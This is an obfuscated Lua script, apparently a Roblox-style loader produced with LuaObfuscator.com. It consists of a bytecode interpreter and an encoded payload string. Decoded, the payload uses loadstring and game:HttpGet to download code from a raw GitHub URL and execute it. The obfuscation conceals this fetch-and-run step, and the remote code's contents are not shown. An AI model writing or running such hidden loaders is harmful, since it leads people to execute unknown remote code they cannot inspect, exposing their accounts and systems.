--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(1638 -(1523 + 114)))) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=(570 -(367 + 201))^(v32-((1805 -(282 + 595)) -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + (0 -0) );v19=v19 + 4 ;return (v37 * (23917454 -7140238)) + (v36 * (66601 -((185 -(32 + 85)) + 997))) + (v35 * (1526 -(226 + 1044))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=0) then else v39=0;v40=nil;v38=1;end if (v38==(3 + 0)) then v45=nil;v46=nil;v38=15 -11 ;end if ((6 -4)==v38) then v43=nil;v44=nil;v38=4 -1 ;end if ((1 + 3)~=v38) then else while true do if (v39==(2 -0)) then v44=nil;v45=nil;v39=3;end if (v39~=0) then else v40=0;v41=nil;v39=1 + 0 ;end if (v39~=(1475 -(1329 + 145))) then else local v96=971 -(140 + 831) ;while true do if (v96==0) then v42=nil;v43=nil;v96=1;end if (v96~=1) then else v39=2;break;end end end if (v39~=(1853 -(1409 + 441))) then else v46=nil;while true do local v97=718 -(15 + 703) ;while true do if (v97~=1) then else if (v40==(1 + 1)) then local v120=0;while true do if (v120~=(438 -(262 + 176))) then else for v152=1722 -(345 + 1376) ,v45 do local v153=0;local v154;local v155;local v156;local v157;while true do if (v153~=(689 -(198 + 490))) then else v156=nil;v157=nil;v153=2;end if (0==v153) then v154=0 -0 ;v155=nil;v153=1;end if (2==v153) then while true do if (v154==1) then v157=nil;while true do if (v155~=(0 -0)) then else local v175=1206 -(696 + 510) ;local v176;while true do if (v175==(0 -0)) then v176=0;while true do if (v176~=(1262 -(1091 + 171))) then else v156=v22();v157=nil;v176=1;end if (v176==1) then v155=1 + 0 ;break;end end break;end end end if (v155~=1) then else if (v156==(3 -2)) then v157=v22()~=(0 -0) ;elseif (v156==(376 -(123 + 251))) then v157=v25();elseif (v156==3) then v157=v26();end v46[v152]=v157;break;end end break;end if (v154~=0) then else v155=0 -0 ;v156=nil;v154=699 -(208 + 490) ;end end break;end end end v44[1 + 2 ]=v22();v120=1;end if (v120==(1 + 0)) then for v158=1,v24() do local v159=836 -(660 + 176) ;local v160;while true do if (v159~=(0 + 0)) then else v160=v22();if (v21(v160,1,1)~=(202 -(14 + 188))) then else local v169=0;local v170;local v171;local v172;local v173;local v174;while true do if (v169==0) then v170=675 -(534 + 141) ;v171=nil;v169=1 + 0 ;end if (v169==1) then v172=nil;v173=nil;v169=2 + 0 ;end if (2==v169) then v174=nil;while true do if (v170==2) then while true do if (v171==0) then local v182=0 + 0 ;local v183;local v184;while true do if (v182==0) then v183=0 -0 ;v184=nil;v182=1;end if (v182==(1 -0)) then while true do if (v183==(0 -0)) then v184=0 + 0 ;while true do if (v184==1) then v171=1;break;end if (v184~=(0 + 0)) then else v172=v21(v160,398 -(115 + 281) ,3);v173=v21(v160,4,13 -7 );v184=1 + 0 ;end end break;end end break;end end end if (v171~=(2 -1)) then else local v185=0 -0 ;local v186;local v187;while true do if (v185==(868 -(550 + 317))) then while true do if (v186==0) then v187=0;while true do if (0==v187) then v174={v23(),v23(),nil,nil};if (v172==0) then local v197=0;local v198;while true do if (0==v197) then v198=0 -0 ;while true do if (v198==(285 -(134 + 151))) then v174[1668 -(970 + 695) ]=v23();v174[7 -3 ]=v23();break;end end break;end end elseif (v172==(1991 -(582 + 1408))) then v174[3]=v24();elseif (v172==(6 -4)) then v174[3 -0 ]=v24() -(2^16) ;elseif (v172~=(11 -8)) then else local v207=1824 -(1195 + 629) ;while true do if (v207~=0) then else v174[3 -0 ]=v24() -(2^16) ;v174[4]=v23();break;end end end v187=1;end if (1~=v187) then else v171=2;break;end end break;end end break;end if (v185==0) then v186=0;v187=nil;v185=1;end end end if (v171~=(244 -(187 + 54))) then else if (v21(v173,3,3)==1) then v174[4]=v46[v174[784 -(162 + 618) ]];end v41[v158]=v174;break;end if (v171==(2 + 0)) then local v189=0 + 0 ;local v190;while true do if ((0 -0)~=v189) then else v190=0 -0 ;while true do if (v190==(0 + 0)) then local v195=1636 -(1373 + 263) ;local v196;while true do if (v195~=(1000 -(451 + 549))) then else v196=0 + 0 ;while true do if (v196~=1) then else v190=1 -0 ;break;end if (v196==(0 -0)) then if (v21(v173,1385 -(746 + 638) ,1)~=1) then else v174[2]=v46[v174[1 + 1 ]];end if (v21(v173,2 -0 ,2)==(342 -(218 + 123))) then v174[1584 -(1535 + 46) ]=v46[v174[3]];end v196=1;end end break;end end end if (v190==1) then v171=3;break;end end break;end end end end break;end if (v170==0) then local v178=0;local v179;while true do if (v178~=(0 + 0)) then else v179=0 + 0 ;while true do if (v179==(561 -(306 + 254))) then v170=1;break;end if (v179~=(0 + 0)) then else local v193=0 -0 ;while true do if (v193==1) then v179=1;break;end if (v193==0) then v171=1467 -(899 + 568) ;v172=nil;v193=1;end end end end break;end end end if (v170==(1 + 0)) then local v180=0;local v181;while true do if (v180~=0) then else v181=0;while true do if (v181~=(0 -0)) then else local v194=603 -(268 + 335) ;while true do if (v194~=(290 -(60 + 230))) then else v173=nil;v174=nil;v194=1;end if (v194~=1) then else v181=1;break;end end end if (v181==1) then v170=574 -(426 + 146) ;break;end end break;end end end end break;end end end break;end end end v40=3;break;end end end if (v40~=(1 + 0)) then else local v121=1456 -(282 + 1174) ;while true do if (v121==1) then v46={};v40=2;break;end if (v121~=(811 -(569 + 242))) then else v44={v41,v42,nil,v43};v45=v24();v121=1272 -(945 + 326) ;end end end break;end if (v97==0) then if (v40~=0) then else local v122=0 -0 ;while true do if (v122==0) then v41={};v42={};v122=1 + 0 ;end if (v122~=(701 -(271 + 429))) then else v43={};v40=1 + 0 ;break;end end end if (v40~=3) then else local v123=1500 -(1408 + 92) ;while true do if ((1086 -(461 + 625))==v123) then for v161=1,v24() do v42[v161-1 ]=v29();end return v44;end end end v97=1289 -(993 + 295) ;end end end break;end end break;end if (v38==(1 + 0)) then v41=nil;v42=nil;v38=1173 -(418 + 753) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1;local v50=(v21(v48,1 + 0 ,3 + 17 ) * ((1 + 0 + 1)^(9 + 23))) + v47 ;local v51=v21(v48,550 -((905 -499) + 123) ,31);local v52=((v21(v48,1801 -(1749 + 20) )==(1 + (0 -0))) and  -(1323 -(1249 + 73))) or (1 + 0) ;if (v51==(1145 -(466 + 679))) then if (v50==(0 -0)) then return v52 * (0 -0) ;else local v89=1900 -(106 + 1794) ;while true do if ((0 + 0)==v89) then v51=1 + (166 -(122 + 44)) ;v49=0 -0 ;break;end end end elseif (v51==(5542 -3495)) then return ((v50==(114 -(4 + 110))) and (v52 * ((585 -(57 + 527))/(0 -0)))) or (v52 * NaN) ;end return v8(v52,v51-((8127 -5677) -(41 + 1386)) ) * (v49 + (v50/(2^((127 + 28) -(3 + 14 + 86))))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(66 -(30 + 35)) );v19=v19 + v53 ;local v55={};for v67=1 + 0 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=1257 -(1043 + 214) ;local v58;local v59;while true do if (v57==(0 -0)) then v58,v59=v1(v16,v19,v19 + (1214 -(323 + 889)) );v19=v19 + (5 -3) ;v57=581 -((774 -(15 + 398)) + 219) ;end if (v57==(321 -(53 + 267))) then return (v59 * ((1040 -(18 + 964)) + 198)) + v58 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v60,16));if v20 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v86,v20);v20=nil;v98=1;end end else return v86;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v88=0;while true do if (v88==1) then if (v82<=3) then if (v82<=1) then if (v82==0) then do return;end elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82>2) then local v100=v81[2];local v101=v79[v81[3]];v79[v100 + 1 ]=v101;v79[v100]=v101[v81[4]];else v79[v81[2]]=v81[3];end elseif (v82<=5) then if (v82>4) then v79[v81[2]]();else local v107=v81[2];v79[v107]=v79[v107](v13(v79,v107 + 1 ,v74));end elseif (v82==6) then local v109=0;local v110;local v111;local v112;local v113;local v114;while true do if (v109==8) then v81=v69[v73];do return;end break;end if (v109==6) then v73=v73 + 1 ;v81=v69[v73];v114=v81[2];v79[v114]=v79[v114](v13(v79,v114 + 1 ,v74));v109=7;end if (v109==3) then v79[v114 + 1 ]=v113;v79[v114]=v113[v81[4]];v73=v73 + 1 ;v81=v69[v73];v109=4;end if (v109==1) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v109=2;end if (7==v109) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v109=8;end if (v109==0) then v110=nil;v111,v112=nil;v113=nil;v114=nil;v109=1;end if (5==v109) then v111,v112=v72(v79[v114](v13(v79,v114 + 1 ,v81[3])));v74=(v112 + v114) -1 ;v110=0;for v146=v114,v74 do v110=v110 + 1 ;v79[v146]=v111[v110];end v109=6;end if (v109==4) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v114=v81[2];v109=5;end if (v109==2) then v73=v73 + 1 ;v81=v69[v73];v114=v81[2];v113=v79[v81[3]];v109=3;end end else local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==0) then v116=v81[2];v117,v118=v72(v79[v116](v13(v79,v116 + 1 ,v81[3])));v115=1;end if (v115==2) then for v149=v116,v74 do v119=v119 + 1 ;v79[v149]=v117[v119];end break;end if (v115==1) then v74=(v118 + v116) -1 ;v119=0;v115=2;end end end v73=v73 + 1 ;break;end if (v88==0) then v81=v69[v73];v82=v81[1];v88=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F66587A2O31342F66587A2O31342F6D61696E2F63616F6E696D612E74787400083O0012063O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);